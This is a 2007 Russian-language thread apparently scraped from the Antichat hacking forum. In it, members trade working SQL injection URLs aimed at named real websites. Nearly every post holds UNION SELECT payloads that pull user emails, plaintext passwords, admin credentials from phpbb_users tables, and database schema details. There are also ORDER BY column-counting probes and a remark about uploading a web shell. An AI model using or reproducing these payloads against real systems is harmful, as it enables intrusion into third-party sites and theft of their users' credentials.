Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.06.2007, 15:42
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
reel-stream.com
Код:
http://www.reel-stream.com/headline.php?id=-1+union+select+concat(email,0x3a,password),2,3,4+from+user/*
пароли в чистом виде
|
|
|
12.06.2007, 16:07
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от iv.
Код:
http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*
Вывод всех таблиц
Код:
http://opticalnet.ru/articles.phtml?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/*
Хы, какие мы имеем права
Код:
http://opticalnet.ru/articles.phtml?id=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name='user'+limit+1,50/*
Сейчас шеллик зальем =)
|
|
|
|
12.06.2007, 16:14
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
www.equipnet.ru
Код:
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+convert(concat_ws(0x3b,user(),database(),version())+using+cp1251)/*
|
|
|
|
12.06.2007, 16:18
|
|
Участник форума
Регистрация: 11.01.2007
Сообщений: 125
Провел на форуме:
868251
Репутация:
27
|
|
до 15 дошел. дальше не пробовал
http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15/*
хотя как я понял конструкция ордер бай действует так:
если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку.
ну вот
http://astrol.ru/index.php?page=125'+order+by+15/*
|
|
|
|
12.06.2007, 16:22
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от Barney
до 15 дошел. дальше не пробовал
http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15/*
хотя как я понял конструкция ордер бай действует так:
если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку.
ну вот
http://astrol.ru/index.php?page=125'+order+by+15/*
Код:
http://astrol.ru/index.php?page=125+order+by+7/*
Код:
http://astrol.ru/index.php?page=125+order+by+8/*
при 8 ошибка, значит столбцов меньше, чем 8
при 7 нет ошибки, значит столбцов 7, логично?
Код:
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/*
rtfm
ps: опережая следующий вопрос:
вывод в 5ку... ошибка при выводе 'version()'
как выяснилось, несоответствие кодировок.
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7/*
pps: гм... http://astrol.ru/forum/admin/ инсталляшка Phorum'а)
Последний раз редактировалось n1†R0x; 12.06.2007 в 16:25..
|
|
|
|
12.06.2007, 16:28
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
www.sacr.sk
Код:
http://sacr.sk/article?id=-1+union+select+concat_ws(0x3b,user(),database(),version()),2/*&category=&lang=ru
|
|
|
|
12.06.2007, 16:57
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
2Barney
ну и собственно сам админ
Код:
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,char(48),user_password),6,7+from+phpbb_users+limit+1,1/*
|
|
|
|
12.06.2007, 17:06
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://www.databasepublish.com/
Код:
http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10,11+from+users/*
И даже есть доступ к таблице users! Но password вывадить решительно отказывается. Кидает на index.
http://www.grid.iu.edu/
Код:
http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/*
Ну и так, по мелочи:
Код:
http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/*
http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/*
http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*
|
|
|
|
12.06.2007, 20:17
|
|
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264
Репутация:
26
|
|
http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/*
http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
Последний раз редактировалось ice1k; 12.06.2007 в 20:24..
|
|
|
|
12.06.2007, 20:43
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
Би-2 (оф. сайт группы)
http://www.bdva.ru/
-> версия - пятерка
названия всех табличек и колонок выводятся без лимита посредством запроса:
http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,table_sche ma,table_name,column_name),4,5,6,7,8,9+from+inform ation_schema.columns/*
-> есть форум phpbb_users.
Есть еще табличка, где фигурируют пароли - radio_users
http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,id,name,lo gin,pass,www,mail),4,5,6,7,8,9+from+radio_users/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
